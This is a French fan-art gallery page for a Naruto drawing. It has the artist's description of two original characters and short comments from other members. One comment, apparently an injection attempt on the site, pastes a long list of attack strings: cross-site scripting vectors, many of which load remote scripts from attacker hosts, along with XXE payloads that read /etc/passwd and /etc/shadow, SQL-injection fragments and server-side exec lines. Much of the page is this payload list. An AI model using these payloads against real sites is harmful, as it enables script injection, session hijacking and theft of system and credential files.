Fanart Naruto » Galerie de Arilya » ~ Team Arilya ~:

~ Team Arilya ~

« La nouvelle tabletteShiruku Chunin »

Fanart Naruto par Arilya

Taille réelle
1296x1290 - 295 ko - Vu 691 fois - Noté 7.57 par 10 membres - Commenté 5 fois


Arilya (Masculin), le 26/03/2020 à 20:53
Oekaki (fait à l'ordinateur uniquement)
Galerie de Arilya Un favori:

- Kami no Kyôki
Hello bandes de ninja !

Confinement oblige (Restéchévous), alors j'essaie de bosser le dessin, il ne reste plus que ça a faire..
Du coup petit dessin d'Arilya-Senseï et Shiruku ma petite nouvelle Hyuga (mes deux OCs)...

Le principal objectif était de rentre le tout plus doux. Depuis quelque temps et avec ma nouvelle tablette qui n'a rien arrangé, j'avais du mal a faire un rendu sympathique a regarder, c'était beaucoup trop agressif... Alors bon, j'ai suivis les conseil de Kyoki-sama "LES OMBRES GRIS/NOIR CEST NADA FAUT ALLER SUR DU TERRACOTA" ! Alors j'ai essayé ! Et je crois que j'ai réussi ! J'ai pas mal bosser les yeux, les lèvres, les sourcils, les oreilles... Bref, je me suis blindé de tuto et du coup j'ai mis du temps... Mais je suis satisfait et j'ai appris pleins de chose !

J'espère que ca plaira !
Vive WON, vive Naruto, vive le dessin ! Never Give UP and Work :D !


Veuillez vous identifier ou vous inscrire:
Pseudo: Mot de Passe:
And ROHAN will answer !We are Legend ~Arilya - LegendSortir de sa zone de confortLa nouvelle tablette
Fanart Naruto » Galerie de Arilya » Commentaires:


Sir Floodon <iframe src="javascript:alert('XSS by nxss');"></iframe><marquee by xss</h1></marquee>
'><SCRIPT>alert(String.fromCh src="" alt='
"><SCRIPT>alert(String.fromCh src="" alt="
'><SCRIPT>alert(String.from src="" alt='
http://www.simpatie.ro/index.p javapgno=2 ??XSS??
http://www.simpatie.ro/index.p p=2 ??XSS??
'); alert('xss'); var x='
\'); alert('xss');var x='
//--></SCRIPT><SCRIPT>alert(St
>"><ScRiPt%20%0a%0d>alert(561
<img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.
</body>
</html>
<SCRIPT SRC=http://hacker-site.com/xss
<SCRIPT> alert(“XSS”); </SCRIPT>
<BODY ONLOAD=alert("XSS")>
<BODY BACKGROUND="javascript:alert(
<IMG SRC="javascript:alert('XSS'
<IMG DYNSRC="javascript:alert('XS
<IMG LOWSRC="javascript:alert('XS
<IFRAME SRC=”http://hacker-site.com/xs
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS'
<LINK REL="stylesheet" HREF="javascript:alert('XSS
<TABLE BACKGROUND="javascript:alert(
<TD BACKGROUND="javascript:alert(
<DIV STYLE="background-image: url(javascript:alert('XSS'))
<DIV STYLE="width: expression(alert('XSS'));">
<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.h
<EMBED SRC="http://hacker.com/xss.sw AllowScriptAccess="always">
&apos;;alert(String.fromCharCo
&apos;&apos;;!--&quot;&lt;XSS&
&lt;SCRIPT&gt;alert(&apos;XSS&
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
&lt;SCRIPT&gt;alert(String.fro
&lt;BASE HREF=&quot;javascript:alert(&a
&lt;BGSOUND SRC=&quot;javascript:alert(&ap
&lt;BODY BACKGROUND=&quot;javascript:al
&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&
&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS
&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&
&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apo
&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&ap
&lt;IFRAME SRC=&quot;javascript:alert(&ap
&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&ap
&lt;IMG SRC=&quot;javascript:alert(&ap
&lt;IMG SRC=javascript:alert(&apos;XSS
&lt;IMG DYNSRC=&quot;javascript:alert(
&lt;IMG LOWSRC=&quot;javascript:alert(
&lt;IMG SRC=&quot;http://www.thesiteyo
Redirect 302 /a.jpg http://victimsite.com/admin.as
exp/*&lt;XSS STYLE=&apos;noxss:noxss(&quo
&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#3
&lt;IMG SRC=&apos;vbscript:msgbox(&quo
&lt;LAYER SRC=&quot;http://ha.ckers.org/
&lt;IMG SRC=&quot;livescript:[code]&qu
%BCscript%BEalert(%A2XSS%A2)%B
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:ale
&lt;IMG SRC=&quot;mocha:[code]&quot;&g
&lt;OBJECT TYPE=&quot;text/x-scriptlet&qu DATA=&quot;http://ha.ckers.org
&lt;OBJECT classid=clsid:ae24fdae-03c6-11 name=url value=javascript:alert(&apos;X
&lt;EMBED SRC=&quot;http://ha.ckers.org/ AllowScriptAccess=&quot;always
a=&quot;get&quot;;&amp;#10;b=&
&lt;STYLE TYPE=&quot;text/javascript&quo
&lt;IMG STYLE=&quot;xss:expr/*XSS*/ess
&lt;XSS STYLE=&quot;xss:expression(ale
&lt;STYLE&gt;.XSS{background-i CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=&quot;text/css&quot;&gt;B
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&a
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org
&lt;STYLE&gt;@import&apos;http
&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ck REL=stylesheet&quot;&gt;
&lt;STYLE&gt;BODY{-moz-binding
&lt;TABLE BACKGROUND=&quot;javascript:al
&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:al
&lt;HTML xmlns:xss&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt; SRC=&quot;javas]]&gt;&lt;![CDA
&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&ap
&lt;XML SRC=&quot;http://ha.ckers.org/ ID=I&gt;&lt;/XML&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;!--[if gte IE 4]&gt;
&lt;META HTTP-EQUIV=&quot;Set-Cookie&qu Content=&quot;USERID=&lt;SCRIP
&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.ht
&lt;SCRIPT SRC=&quot;http://ha.ckers.org/
&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#e cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss
&lt;? echo(&apos;&lt;SCR)&apos;;
&lt;BR SIZE=&quot;&amp;{alert(&apos;X
&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS
&lt;IMG SRC=javascript:alert(&amp;quot
&lt;IMG SRC=`javascript:alert(&quot;RS says, &apos;XSS&apos;&quot;)`&gt;
&lt;IMG SRC=javascript:alert(String.fr
&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#1
&lt;IMG SRC=&amp;#0000106&amp;#0000097
&lt;DIV STYLE=&quot;background-image:
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x7
&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE& CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-a
&quot;;alert(&apos;XSS&apos;
&lt;/TITLE&gt;&lt;SCRIPT&gt;al
&lt;STYLE&gt;@import&apos;
&lt;IMG SRC=&quot;jav&#x09;ascript:ale
&lt;IMG SRC=&quot;jav&amp;#x09;ascript
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript
&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&
perl -e &apos;print &quot;&lt;IMG SRC=javascript:alert(&quot; out
perl -e &apos;print &quot;&amp;&lt;SCRIPT&gt;al &gt; out
&lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apo
&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
&lt;IMG SRC=&quot;javascript:alert(&ap
&lt;IFRAME SRC=http://ha.ckers.org/script &lt;
&lt;&lt;SCRIPT&gt;alert(&quot;
&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRI
&lt;SCRIPT&gt;a=/XSS/
&lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/
&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/
&lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/
&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/
&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/
&lt;SCRIPT&gt;document.write(& SRC=&quot;http://ha.ckers.org/
&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/
&lt;A HREF=&quot;http://66.102.7.147
&lt;A HREF=&quot;http://%77%77%77%2E
&lt;A HREF=&quot;http://1113982867/&
&lt;A HREF=&quot;http://0x42.0x00000
&lt;A HREF=&quot;http://0102.0146.00
&lt;A HREF=&quot;h&#x0A;tt&#09;p://6
&lt;A HREF=&quot;//www.google.com/&q
&lt;A HREF=&quot;//google&quot;&gt;X
&lt;A HREF=&quot;http://ha.ckers.org
&lt;A HREF=&quot;http://google:ha.ck
&lt;A HREF=&quot;http://google.com/&
&lt;A HREF=&quot;http://www.google.c
&lt;A HREF=&quot;javascript:document
&lt;A HREF=&quot;http://www.gohttp:/
<script>document.vulnerable=tr
<img SRC="jav ascript:document.vulnerable=tr
<img SRC="javascript:document.vuln
<img SRC=" &#14; javascript:document.vulnerable
<body onload!#$%&()*~+-_.,:;?@[/|]
<<SCRIPT>document.vulnerable=t
<script <B>document.vulnerable=true;</
<img SRC="javascript:document.vuln
<iframe src="javascript:document.vuln <
<script>a=/XSS/ndocument.vul
";document.vulnerable=true;
</title><SCRIPT>document.vulne
<input TYPE="IMAGE" SRC="javascript:document.vuln
<body BACKGROUND="javascript:docume
<body ONLOAD=document.vulnerable=tru
<img DYNSRC="javascript:document.v
<img LOWSRC="javascript:document.v
<bgsound SRC="javascript:document.vuln
<br SIZE="&{document.vulnerable=t
<LAYER SRC="javascript:document.vuln
<link REL="stylesheet" HREF="javascript:document.vul
<style>li {list-style-image: url("javascript:document.vuln
<img SRC='vbscript:document.vulner
1script3document.vulnerable=tr
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:doc
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:doc
<IFRAME SRC="javascript:document.vuln
<FRAMESET><FRAME SRC="javascript:document.vuln
<table BACKGROUND="javascript:docume
<table><TD BACKGROUND="javascript:docume
<div STYLE="background-image: url(javascript:document.vulner
<div STYLE="background-image: url(&#1;javascript:document.vu
<div STYLE="width: expression(document.vulnerable
<style>@import'javasc
<img STYLE="xss:expr/*XSS*/ession(
<XSS STYLE="xss:expression(documen
exp/*<A STYLE='noxss:noxss("*//*"
<style TYPE="text/javascript">docum
<style>.XSS{background-image:u CLASS=XSS></a>
<style type="text/css">BODY{backgro
<!--[if gte IE 4]><SCRIPT>document.vulnerable
<base HREF="javascript:document.vul
<OBJECT classid=clsid:ae24fdae-03c6-11 name=url value=javascript:document.vuln
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=t DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com namespace="t" implementation="#default#time attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true
<? echo('<SCR)';echo('IPT>docu ?>
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>docum
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-documen
<a href="javascript#document.vul
<div onmouseover="document.vulnera
<img src="javascript:document.vuln
<img dynsrc="javascript:document.v
<input type="image" dynsrc="javascript:document.v
<bgsound src="javascript:document.vuln
&<script>document.vulnerable=t
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true
<link rel="stylesheet" href="javascript:document.vul
<iframe src="vbscript:document.vulner
<img src="mocha:document.vulnerabl
<img src="livescript:document.vuln
<a href="about:<script>document.
<meta http-equiv="refresh" content="0;url=javascript:doc
<body onload="document.vulnerable=t
<div style="background-image: url(javascript:document.vulner
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable
<style type="text/javascript">docum
<object classid="clsid:..." codebase="javascript:document
<style><!--</style><script>doc
<<script>document.vulnerable=t
<![<!--]]<script>document.vuln
<!-- -- --><script>document.vulnerable -- -->
<img src="blah"onmouseover="docu
<img src="blah>" onmouseover="document.vulnera
<xml src="javascript:document.vuln
<xml id="X"><a><b><script>documen
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[xC0][xBC]script>document.
<style>@import'http://www.sec
<meta HTTP-EQUIV="Link" Content="<http://www.security REL=stylesheet">
<style>BODY{-moz-binding:url(
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycomp
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.se
<script SRC="http://www.securitycompa
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass
<script a=">" SRC="http://www.securitycompa
<script =">" SRC="http://www.securitycompa
<script a=">" '' SRC="http://www.securitycompa
<script "a='>'" SRC="http://www.securitycompa
<script a=`>` SRC="http://www.securitycompa
<script a=">'>" SRC="http://www.securitycompa
<script>document.write("<SCRI SRC="http://www.securitycompa
<div style="binding: url(http://www.securitycompass [Mozilla]
&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/
&lt;/script&gt;&lt;script&gt;a
&lt;/br style=a:expression(alert())&gt
&lt;scrscriptipt&gt;alert(1)&l
&lt;br size=&quot;&amp;{alert(&#039
perl -e &#039;print &quot;&lt;IMG SRC=javascript:alert(&quo &gt; out
perl -e &#039;print &quot;&lt;SCRIPT&gt;alert &gt; out
<~/XSS/*-*/STYLE=xss:e/**/xpre
<~/XSS/*-*/STYLE=xss:e/**/xpre
<~/XSS/*-*/STYLE=xss:e/**/xpre
<~/XSS STYLE=xss:expression(alert('X
"><script>alert('XSS')</scr
</XSS/*-*/STYLE=xss:e/**/xpres
XSS/*-*/STYLE=xss:e/**/xpressi
XSS STYLE=xss:e/**/xpression(alert
</XSS STYLE=xss:expression(alert('X
';;alert(String.fromCharCode(
';';;!--";<;XSS>;=&;{()}
<;SCRIPT>;alert(';XSS';)<;/S
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<;SCRIPT>;alert(String.fromCha
<;BASE HREF=";javascript:alert(';XS
<;BGSOUND SRC=";javascript:alert(';XSS
<;BODY BACKGROUND=";javascript:alert
<;BODY ONLOAD=alert(';XSS';)>;
<;DIV STYLE=";background-image: url(javascript:alert(';XSS';
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';X
<;DIV STYLE=";width: expression(alert(';XSS';));
<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS
<;IFRAME SRC=";javascript:alert(';XSS
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS
<;IMG SRC=";javascript:alert(';XSS
<;IMG SRC=javascript:alert(';XSS';
<;IMG DYNSRC=";javascript:alert(';
<;IMG LOWSRC=";javascript:alert(';
<;IMG SRC=";http://www.thesiteyouar
Redirect 302 /a.jpg http://victimsite.com/admin.as
exp/*<;XSS STYLE=';noxss:noxss(";*//*
<;STYLE>;li {list-style-image: url(";javascript:alert(&#39;X
<;IMG SRC=';vbscript:msgbox(";XSS
<;LAYER SRC=";http://ha.ckers.org/scr
<;IMG SRC=";livescript:[code]";>;
%BCscript%BEalert(%A2XSS%A2)%B
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:al
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/htm
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:ale
<;IMG SRC=";mocha:[code]";>;
<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/sc
<;OBJECT classid=clsid:ae24fdae-03c6-11 name=url value=javascript:alert(';XSS
<;EMBED SRC=";http://ha.ckers.org/xss AllowScriptAccess=";always";
a=";get";;&;#10;b=";URL(";
<;STYLE TYPE=";text/javascript";>;al
<;IMG STYLE=";xss:expr/*XSS*/ession
<;XSS STYLE=";xss:expression(alert(
<;STYLE>;.XSS{background-image CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{back
<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XS
<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xs
<;STYLE>;@import';http://ha.c
<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.o REL=stylesheet";>;
<;STYLE>;BODY{-moz-binding:url
<;TABLE BACKGROUND=";javascript:alert
<;TABLE>;<;TD BACKGROUND=";javascript:alert
<;HTML xmlns:xss>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IM SRC=";javas]]>;<;![CDATA[crip
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>
<;XML SRC=";http://ha.ckers.org/xss ID=I>;<;/XML>;
<;HTML>;<;BODY>;
<;!--[if gte IE 4]>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;al
<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.ht
<;SCRIPT SRC=";http://ha.ckers.org/xss
<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js
<;? echo(';<;SCR)';;
<;BR SIZE=";&;{alert(';XSS';)}"
<;IMG SRC=JaVaScRiPt:alert(';XSS';
<;IMG SRC=javascript:alert(&;quot;XS
<;IMG SRC=`javascript:alert(";RSnak says, ';XSS';";)`>;
<;IMG SRC=javascript:alert(String.fr
<;IMG RC=&;#106;&;#97;&;#118;&;#97;&
<;IMG RC=&;#0000106&;#0000097&;#0000
<;DIV STYLE=";background-image:0
<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert
";;alert(';XSS';);//
<;/TITLE>;<;SCRIPT>;alert("XS
<;STYLE>;@import';javas
<;IMG SRC=";jav&#x09;ascript:alert(
<;IMG SRC=";jav&;#x09;ascript:alert
<;IMG SRC=";jav&;#x0A;ascript:alert
<;IMG SRC=";jav&;#x0D;ascript:alert
<;IMG&#x0D;SRC&#x0D;=&#x0D;";
perl -e ';print ";<;IM SRC=javascript:alert(";XSS out
perl -e ';print ";&;<;SCRIPT>;alert(";XSS >; out
<;IMG SRC="; &;#14; javascript:alert(';XSS';);"
<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss
<;BODY onload!#$%&;()*~+-_.,:;?@[/|
<;SCRIPT SRC=http://ha.ckers.org/xss.js
<;SCRIPT SRC=//ha.ckers.org/.j>;
<;IMG SRC=";javascript:alert(';XSS
<;IFRAME SRC=http://ha.ckers.org/script <;
<;<;SCRIPT>;alert(";XSS";);/
<;IMG ";";";>;<;SCRIPT>;alert(";
<;SCRIPT>;a=/XSS/
<;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss
<;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss
<;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss
<;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss
<;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss
<;SCRIPT>;document.write(";<; SRC=";http://ha.ckers.org/xss
<;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss
<;A HREF=";http://66.102.7.147/"
<;A HREF=";http://%77%77%77%2E%67
<;A HREF=";http://1113982867/";>
<;A HREF=";http://0x42.0x0000066.
<;A HREF=";http://0102.0146.0007.
<;A HREF=";h&#x0A;tt&#09;p://6&;#
<;A HREF=";//www.google.com/";>;
<;A HREF=";//google";>;XSS<;/A>;
<;A HREF=";http://ha.ckers.org@go
<;A HREF=";http://google:ha.ckers
<;A HREF=";http://google.com/";>
<;A HREF=";http://www.google.com.
<;A HREF=";javascript:document.lo
<;A HREF=";http://www.gohttp://ww
<script>document.vulnerable=tr
<img SRC="jav ascript:document.vulnerable=tr
<img SRC="javascript:document.vuln
<img SRC=" &#14; javascript:document.vulnerable
<body onload!#$%&()*~+-_.,:;?@[/|]
<<SCRIPT>document.vulnerable=t
<script <B>document.vulnerable=true;</
<img SRC="javascript:document.vuln
<iframe src="javascript:document.vuln <
<script>a=/XSS/ndocument.vul
";document.vulnerable=true;
</title><SCRIPT>document.vulne
<input TYPE="IMAGE" SRC="javascript:document.vuln
<body BACKGROUND="javascript:docume
<body ONLOAD=document.vulnerable=tru
<img DYNSRC="javascript:document.v
<img LOWSRC="javascript:document.v
<bgsound SRC="javascript:document.vuln
<br SIZE="&{document.vulnerable=t
<LAYER SRC="javascript:document.vuln
<link REL="stylesheet" HREF="javascript:document.vul
<style>li {list-style-image: url("javascript:document.vuln
<img SRC='vbscript:document.vulner
1script3document.vulnerable=tr
<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:doc
<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:doc
<IFRAME SRC="javascript:document.vuln
<FRAMESET><FRAME SRC="javascript:document.vuln
<table BACKGROUND="javascript:docume
<table><TD BACKGROUND="javascript:docume
<div STYLE="background-image: url(javascript:document.vulner
<div STYLE="background-image: url(&#1;javascript:document.vu
<div STYLE="width: expression(document.vulnerable
<style>@import'javasc
<img STYLE="xss:expr/*XSS*/ession(
<XSS STYLE="xss:expression(documen
exp/*<A STYLE='noxss:noxss("*//*"
<style TYPE="text/javascript">docum
<style>.XSS{background-image:u CLASS=XSS></a>
<style type="text/css">BODY{backgro
<!--[if gte IE 4]><SCRIPT>document.vulnerable
<base HREF="javascript:document.vul
<OBJECT classid=clsid:ae24fdae-03c6-11 name=url value=javascript:document.vuln
<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=t DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com namespace="t" implementation="#default#time attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true
<? echo('<SCR)';echo('IPT>docu ?>
<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>docum
<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-documen
<a href="javascript#document.vul
<div onmouseover="document.vulnera
<img src="javascript:document.vuln
<img dynsrc="javascript:document.v
<input type="image" dynsrc="javascript:document.v
<bgsound src="javascript:document.vuln
&<script>document.vulnerable=t
&{document.vulnerable=true;};
<img src=&{document.vulnerable=true
<link rel="stylesheet" href="javascript:document.vul
<iframe src="vbscript:document.vulner
<img src="mocha:document.vulnerabl
<img src="livescript:document.vuln
<a href="about:<script>document.
<meta http-equiv="refresh" content="0;url=javascript:doc
<body onload="document.vulnerable=t
<div style="background-image: url(javascript:document.vulner
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression(document.vulnerable
<style type="text/javascript">docum
<object classid="clsid:..." codebase="javascript:document
<style><!--</style><script>doc
<<script>document.vulnerable=t
<![<!--]]<script>document.vuln
<!-- -- --><script>document.vulnerable -- -->
<img src="blah"onmouseover="docu
<img src="blah>" onmouseover="document.vulnera
<xml src="javascript:document.vuln
<xml id="X"><a><b><script>documen
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[xC0][xBC]script>document.
<style>@import'http://www.sec
<meta HTTP-EQUIV="Link" Content="<http://www.security REL=stylesheet">
<style>BODY{-moz-binding:url(
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycomp
<HTML xmlns:xss><?import namespace="xss" implementation="http://www.se
<script SRC="http://www.securitycompa
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass
<script a=">" SRC="http://www.securitycompa
<script =">" SRC="http://www.securitycompa
<script a=">" '' SRC="http://www.securitycompa
<script "a='>'" SRC="http://www.securitycompa
<script a=`>` SRC="http://www.securitycompa
<script a=">'>" SRC="http://www.securitycompa
<script>document.write("<SCRI SRC="http://www.securitycompa
<div style="binding: url(http://www.securitycompass [Mozilla]
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|
<;/script>;<;script>;alert(1)<
<;/br style=a:expression(alert())>;
<;scrscriptipt>;alert(1)<;/scr
<;br size=";&;{alert(&#039;XSS&#
perl -e &#039;print ";<;IMG SRC=javascript:alert(";X >; out
perl -e &#039;print ";<;SCRIPT>;alert(";X >; out
<~/XSS/*-*/STYLE=xss:e/**/xpre
<~/XSS/*-*/STYLE=xss:e/**/xpre
<~/XSS/*-*/STYLE=xss:e/**/xpre
<~/XSS STYLE=xss:expression(alert('X
"><script>alert('XSS')</scr
</XSS/*-*/STYLE=xss:e/**/xpres
XSS/*-*/STYLE=xss:e/**/xpressi
XSS STYLE=xss:e/**/xpression(alert
</XSS STYLE=xss:expression(alert('X
>"><script>alert("XSS")</sc
"><STYLE>@import"javascript:
>"'><img%20src%3D%26%23x6a;%
>%22%27><img%20src%3d%22javasc
'%uff1cscript%uff1ealert('XS
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS'
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert(&quot;XSS
<IMGSRC=&#106;&#97;&#118;&#97;
<IMGSRC=&#0000106&#0000097&<WB
<IMGSRC=&#x6A&#x61&#x76&#x61&#
<IMG SRC="jav&#x0A;ascript:alert(<
<IMG SRC="jav&#x0D;ascript:alert(<
<![CDATA[<script>var n=0;while(true){n++;}</script>
<?xml version="1.0" encoding="ISO-8859-1"?><foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo> or 1=1 or ''=']]></foof>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOC foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOC foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOC foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOC foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>
<script>alert('XSS')</script
%3cscript%3ealert('XSS')%3c/
%22%3e%3cscript%3ealert('XSS
<IMG SRC="javascript:alert('XSS'
<IMG SRC=javascript:alert(&quot;XSS
<IMG SRC=javascript:alert('XSS')>
<img src=xss onerror=alert(1)>
<IMG """><SCRIPT>alert("XSS")<
<IMG SRC=javascript:alert(String.fr
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert(
<IMG SRC=&#106;&#97;&#118;&#97;&#11
<IMG SRC=&#0000106&#0000097&#000011
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&
<BODY BACKGROUND="javascript:alert(
<BODY ONLOAD=alert('XSS')>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS'
<IMG SRC="javascript:alert('XSS'
<iframe src=http://ha.ckers.org/script <
<<SCRIPT>alert("XSS");//<</S
%253cscript%253ealert(1)%253c/
"><s"%2b"cript>alert(docume
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr<
<SCRIPT>String.fromCharCode(97 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
';alert(String.fromCharCode(8
<marquee onstart='javascript:alert('1
Sir Floodon - Etudiant - Profil - 28/04/2021 à 07:56 Online

sariana super, c'est bien fait et en 3D. ça vraiment du te prendre du temps mais ça en valait la peine
sariana - Bon Genin - Profil - 24/06/2020 à 15:04 Online

Le Guerrier Très beau fanart. J’aime bien et ru as vraiment travaillé les détails. Beaucoup de talent ici! Allez hop, je te met un 10/10
Le Guerrier - Chuunin - Profil - 24/04/2020 à 16:15 Online
61935

Arilya nathéo > Aoouh c'est gentil ! Ben il y en a encore quand même... J'arrives peut être plus a les camoufler maintenant haha !!

C'est gentil merci ! J'ai regarder les deux jeux, et du coup je sais pas comme le prendre vu que ca fais quand meme vachement vintage comme colos haha !! Mais bon je vais retenir le "super classe" !! Merci :D
Arilya - Excellent Genin - Profil - 07/04/2020 à 13:53 Online

nathéo Résistance ! Ouaaaais


